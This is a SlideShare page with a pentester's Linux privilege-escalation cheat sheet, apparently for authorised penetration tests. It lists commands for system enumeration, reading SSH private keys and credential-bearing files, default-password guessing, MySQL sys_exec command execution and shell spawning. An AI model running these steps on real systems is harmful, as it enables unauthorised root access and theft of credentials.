SlideShare uma empresa Scribd logo

Linux advanced privilege escalation

J
Jameel Nabbo

Author: Jameel Nabbo Company: UITSEC This guide contain a practical hands on Linux privilege escalation techniques and methods. based on a real penetration testing experience.

Tecnologia
1 de 11
Baixar para ler offline
Linux Advanced Privilege Escalation Author: Jameel Nabbo
Table of contents Introduction Kernel Exploits Applications & Services Common passwords Suid and Guid Misconfiguration Finding hardcoded passwords Finding SSH private keys Cron Jobs Spawning shells Finding unmounted file-systems Finding error messages/requests in the logs Finding scripts that can be invoked as root Useful Enumeration scripts References
Introduction: In this guide, I’ve combined and wrote the most useful techniques that I was doing to escalate my privileges on Linux systems for our clients and internal penetration tests at UITSEC. All rights of these techniques are reserved to the original authors (Check the references section. Once we get a limited shell it is useful to escalate that shells privileges. In this chapter we’ll be going to list common Linux privilege escalation techniques: Kernel exploits Processes Programs running as root Installed software Weak/reused/plaintext passwords Inside service Suid misconfiguration Abusing sudo-rights World writable scripts invoked by root Bad path configuration Cronjobs Unmounted filesystems
Kernel Exploits By exploiting vulnerabilities in the Linux Kernel, we can sometimes escalate our privileges. What we usually need to know to test if a kernel exploit works is the OS, architecture and kernel version. Check the OS / Architecture / Kernel version: uname -a cat /proc/version cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- Search for exploits using Google site:exploit-db.com kernel version Applications & Services LOTs of times I make privilege escalations using the running applications or services on Linux systems, as an example Nmap interactive mode. Here I want notice to a very important thing while enumerating the running applications, ALWAYS check the command section when you run this command: ps -aux ps aux ps -ef top cat /etc/services
Mysql Whenever you find a Mysql running on the system first try to login to it using Root user and common passwords, also don’t forget to try to login also without a password J I learned a good lesson in this while studying OSCP Mysql -u root -p -< then enter root as the passwords or 123456 Mysql -u root -< try without a passwords sometimes you maybe able to login. select sys_exec('whoami'); select sys_eval('whoami'); The above commands will give us a list of the current running applications and services, what matter to us is to see what services is running as root using the following command: ps aux | grep root ps -ef | grep root Get a list of the installed application and check if they’re running. Then Google the application version and see if there’s a public exploit for it. ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ Check the services configurations, also sometimes you may find a passwords in these files that may lead you to make another high privileged actions on the system, or you may find a FTP server that allows an anonymous user to write/upload file in the Root Directory, theses mistakes is common, for the network administrators and developers as well. cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
Common passwords Some popular passwords, whenever you find something you have to login to it try them Admin:admin (try this always, and you maybe lucky ) username:username username:username1 username:root username:admin username:qwerty username:password Suid and Guid Misconfiguration When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a shell or in another way be abuse we could use that to escalate our privileges. For example, these are some programs that can be used to spawn a shell: nmap vim less more nano cp mv find Find suid and guid files #Find SUID find / -perm -u=s -type f 2>/dev/null #Find GUID find / -perm -g=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
Finding hardcoded passwords #finding them in history files cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history #some important files that may contain plain text passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ #Finding them by searching for i in txt csv xls xlsx doc docx php conf; do find /cygdrive/t -name *.$i >> target_file_names.txt done
Finding SSH private keys cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key Finding unmounted file-systems mount df -h cat /etc/fstab What root commands that can be executed as root user for the current user Sudo -l
Cron Jobs crontab -l #notice this command is important try it first ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Finding scripts that can be invoked as root #World writable files directories find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null # World executable folder find / -perm -o x -type d 2>/dev/null # World writable and executable folders find / ( -perm -o w -perm -o x ) -type d 2>/dev/null
Finding error messages/requests in the logs cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/
Spawning shells python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i Useful Enumeration scripts https://github.com/rebootuser/LinEnum http://pentestmonkey.net/tools/audit/unix-privesc-check https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py References: https://blog.g0tmi1k.com https://chryzsh.gitbooks.io/pentestbook https://www.thegeekstuff.com/2011/08/linux-var-log-files https://stackoverflow.com/questions/34032651/searching-an-entire-drive-for-plaintext- passwords

Recomendados

Logical Volume Manager. An Introduction
Logical Volume Manager. An IntroductionLogical Volume Manager. An Introduction
Logical Volume Manager. An Introduction
Juan A. Suárez Romero
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
nullthreat
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
package mangement
package mangementpackage mangement
package mangement
ARYA TM
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
SongchaiDuangpan
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Basics of shell programming
Basics of shell programmingBasics of shell programming
Basics of shell programming
Chandan Kumar Rana
 

Recomendados

Logical Volume Manager. An Introduction
Logical Volume Manager. An IntroductionLogical Volume Manager. An Introduction
Logical Volume Manager. An Introduction
Juan A. Suárez Romero
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
nullthreat
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
package mangement
package mangementpackage mangement
package mangement
ARYA TM
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
SongchaiDuangpan
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Basics of shell programming
Basics of shell programmingBasics of shell programming
Basics of shell programming
Chandan Kumar Rana
 
Java Source Code Analysis using SonarQube
Java Source Code Analysis using SonarQubeJava Source Code Analysis using SonarQube
Java Source Code Analysis using SonarQube
Angelin R
 
Rapport administration systèmes et supervision réseaux tp4 diabang master1 tr
Rapport administration systèmes et supervision réseaux tp4 diabang master1 trRapport administration systèmes et supervision réseaux tp4 diabang master1 tr
Rapport administration systèmes et supervision réseaux tp4 diabang master1 tr
Cheikh Tidiane DIABANG
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen
 
Linux: LVM
Linux: LVMLinux: LVM
Linux: LVM
Michal Sedlak
 
Testing In Django
Testing In DjangoTesting In Django
Testing In Django
Daniel Greenfeld
 
텔레그램을 이용한 양방향 모니터링 시스템 구축
텔레그램을 이용한 양방향 모니터링 시스템 구축텔레그램을 이용한 양방향 모니터링 시스템 구축
텔레그램을 이용한 양방향 모니터링 시스템 구축
I Goo Lee
 
Introduction to Vim
Introduction to VimIntroduction to Vim
Introduction to Vim
Brandon Liu
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
Prashant Hegde
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
Michael Gough
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
Sri Manakula Vinayagar Engineering College
 
모바일 앱(App) 개발 테스트 솔루션 v20160415
모바일 앱(App) 개발 테스트 솔루션 v20160415모바일 앱(App) 개발 테스트 솔루션 v20160415
모바일 앱(App) 개발 테스트 솔루션 v20160415
SeungBeom Ha
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
Sherif Koussa
 
Proxy log review and use cases
Proxy log review and use casesProxy log review and use cases
Proxy log review and use cases
Mostafa Yahia
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
Sam Bowne
 
Linux LVM Logical Volume Management
Linux LVM Logical Volume ManagementLinux LVM Logical Volume Management
Linux LVM Logical Volume Management
Manolis Kartsonakis
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
Saravanan G
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
Micho Hayek
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
Craig Cannon
 
Using Unix Commands.pptx
Using Unix Commands.pptxUsing Unix Commands.pptx
Using Unix Commands.pptx
Harsha Patel
 

Mais conteúdo relacionado

Mais procurados

Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
Sherif Koussa
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 

Mais procurados (20)

Java Source Code Analysis using SonarQube
Java Source Code Analysis using SonarQubeJava Source Code Analysis using SonarQube
Java Source Code Analysis using SonarQube
 
Rapport administration systèmes et supervision réseaux tp4 diabang master1 tr
Rapport administration systèmes et supervision réseaux tp4 diabang master1 trRapport administration systèmes et supervision réseaux tp4 diabang master1 tr
Rapport administration systèmes et supervision réseaux tp4 diabang master1 tr
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Linux: LVM
Linux: LVMLinux: LVM
Linux: LVM
 
Testing In Django
Testing In DjangoTesting In Django
Testing In Django
 
텔레그램을 이용한 양방향 모니터링 시스템 구축
텔레그램을 이용한 양방향 모니터링 시스템 구축텔레그램을 이용한 양방향 모니터링 시스템 구축
텔레그램을 이용한 양방향 모니터링 시스템 구축
 
Introduction to Vim
Introduction to VimIntroduction to Vim
Introduction to Vim
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attack
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
모바일 앱(App) 개발 테스트 솔루션 v20160415
모바일 앱(App) 개발 테스트 솔루션 v20160415모바일 앱(App) 개발 테스트 솔루션 v20160415
모바일 앱(App) 개발 테스트 솔루션 v20160415
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
 
Proxy log review and use cases
Proxy log review and use casesProxy log review and use cases
Proxy log review and use cases
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
 
Linux LVM Logical Volume Management
Linux LVM Logical Volume ManagementLinux LVM Logical Volume Management
Linux LVM Logical Volume Management
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
 
Security misconfiguration
Security misconfigurationSecurity misconfiguration
Security misconfiguration
 

Semelhante a Linux advanced privilege escalation

Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
Craig Cannon
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
Phil Hagen
 
Power point on linux commands,appache,php,mysql,html,css,web 2.0
Power point on linux commands,appache,php,mysql,html,css,web 2.0Power point on linux commands,appache,php,mysql,html,css,web 2.0
Power point on linux commands,appache,php,mysql,html,css,web 2.0
venkatakrishnan k
 
7 unixsecurity
7 unixsecurity7 unixsecurity
7 unixsecurity
richarddxd
 

Semelhante a Linux advanced privilege escalation (20)

Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
Using Unix Commands.pptx
Using Unix Commands.pptxUsing Unix Commands.pptx
Using Unix Commands.pptx
 
Using Unix Commands.pptx
Using Unix Commands.pptxUsing Unix Commands.pptx
Using Unix Commands.pptx
 
Linux
LinuxLinux
Linux
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
 
Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)Hadoop meet Rex(How to construct hadoop cluster with rex)
Hadoop meet Rex(How to construct hadoop cluster with rex)
 
55 best linux tips, tricks and command lines
55 best linux tips, tricks and command lines55 best linux tips, tricks and command lines
55 best linux tips, tricks and command lines
 
Ch23 system administration
Ch23 system administration Ch23 system administration
Ch23 system administration
 
Linux basic for CADD biologist
Linux basic for CADD biologistLinux basic for CADD biologist
Linux basic for CADD biologist
 
Power point on linux commands,appache,php,mysql,html,css,web 2.0
Power point on linux commands,appache,php,mysql,html,css,web 2.0Power point on linux commands,appache,php,mysql,html,css,web 2.0
Power point on linux commands,appache,php,mysql,html,css,web 2.0
 
Linux presentation
Linux presentationLinux presentation
Linux presentation
 
Linux basics part 1
Linux basics part 1Linux basics part 1
Linux basics part 1
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchy
 
7 unixsecurity
7 unixsecurity7 unixsecurity
7 unixsecurity
 
Linux privesc.pptx
Linux privesc.pptxLinux privesc.pptx
Linux privesc.pptx
 
Linux week 2
Linux week 2Linux week 2
Linux week 2
 
Developing IT infrastructures with Puppet
Developing IT infrastructures with PuppetDeveloping IT infrastructures with Puppet
Developing IT infrastructures with Puppet
 
Unix Administration 2
Unix Administration 2Unix Administration 2
Unix Administration 2
 

Último

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 

Último (20)

Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 

Linux advanced privilege escalation

  • 1. Linux Advanced Privilege Escalation Author: Jameel Nabbo
  • 2. Table of contents Introduction Kernel Exploits Applications & Services Common passwords Suid and Guid Misconfiguration Finding hardcoded passwords Finding SSH private keys Cron Jobs Spawning shells Finding unmounted file-systems Finding error messages/requests in the logs Finding scripts that can be invoked as root Useful Enumeration scripts References
  • 3. Introduction: In this guide, I’ve combined and wrote the most useful techniques that I was doing to escalate my privileges on Linux systems for our clients and internal penetration tests at UITSEC. All rights of these techniques are reserved to the original authors (Check the references section. Once we get a limited shell it is useful to escalate that shells privileges. In this chapter we’ll be going to list common Linux privilege escalation techniques: Kernel exploits Processes Programs running as root Installed software Weak/reused/plaintext passwords Inside service Suid misconfiguration Abusing sudo-rights World writable scripts invoked by root Bad path configuration Cronjobs Unmounted filesystems
  • 4. Kernel Exploits By exploiting vulnerabilities in the Linux Kernel, we can sometimes escalate our privileges. What we usually need to know to test if a kernel exploit works is the OS, architecture and kernel version. Check the OS / Architecture / Kernel version: uname -a cat /proc/version cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- Search for exploits using Google site:exploit-db.com kernel version Applications & Services LOTs of times I make privilege escalations using the running applications or services on Linux systems, as an example Nmap interactive mode. Here I want notice to a very important thing while enumerating the running applications, ALWAYS check the command section when you run this command: ps -aux ps aux ps -ef top cat /etc/services
  • 5. Mysql Whenever you find a Mysql running on the system first try to login to it using Root user and common passwords, also don’t forget to try to login also without a password J I learned a good lesson in this while studying OSCP Mysql -u root -p -< then enter root as the passwords or 123456 Mysql -u root -< try without a passwords sometimes you maybe able to login. select sys_exec('whoami'); select sys_eval('whoami'); The above commands will give us a list of the current running applications and services, what matter to us is to see what services is running as root using the following command: ps aux | grep root ps -ef | grep root Get a list of the installed application and check if they’re running. Then Google the application version and see if there’s a public exploit for it. ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/ Check the services configurations, also sometimes you may find a passwords in these files that may lead you to make another high privileged actions on the system, or you may find a FTP server that allows an anonymous user to write/upload file in the Root Directory, theses mistakes is common, for the network administrators and developers as well. cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
  • 6. Common passwords Some popular passwords, whenever you find something you have to login to it try them Admin:admin (try this always, and you maybe lucky ) username:username username:username1 username:root username:admin username:qwerty username:password Suid and Guid Misconfiguration When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a shell or in another way be abuse we could use that to escalate our privileges. For example, these are some programs that can be used to spawn a shell: nmap vim less more nano cp mv find Find suid and guid files #Find SUID find / -perm -u=s -type f 2>/dev/null #Find GUID find / -perm -g=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
  • 7. Finding hardcoded passwords #finding them in history files cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history #some important files that may contain plain text passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ #Finding them by searching for i in txt csv xls xlsx doc docx php conf; do find /cygdrive/t -name *.$i >> target_file_names.txt done
  • 8. Finding SSH private keys cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key Finding unmounted file-systems mount df -h cat /etc/fstab What root commands that can be executed as root user for the current user Sudo -l
  • 9. Cron Jobs crontab -l #notice this command is important try it first ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root Finding scripts that can be invoked as root #World writable files directories find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null # World executable folder find / -perm -o x -type d 2>/dev/null # World writable and executable folders find / ( -perm -o w -perm -o x ) -type d 2>/dev/null
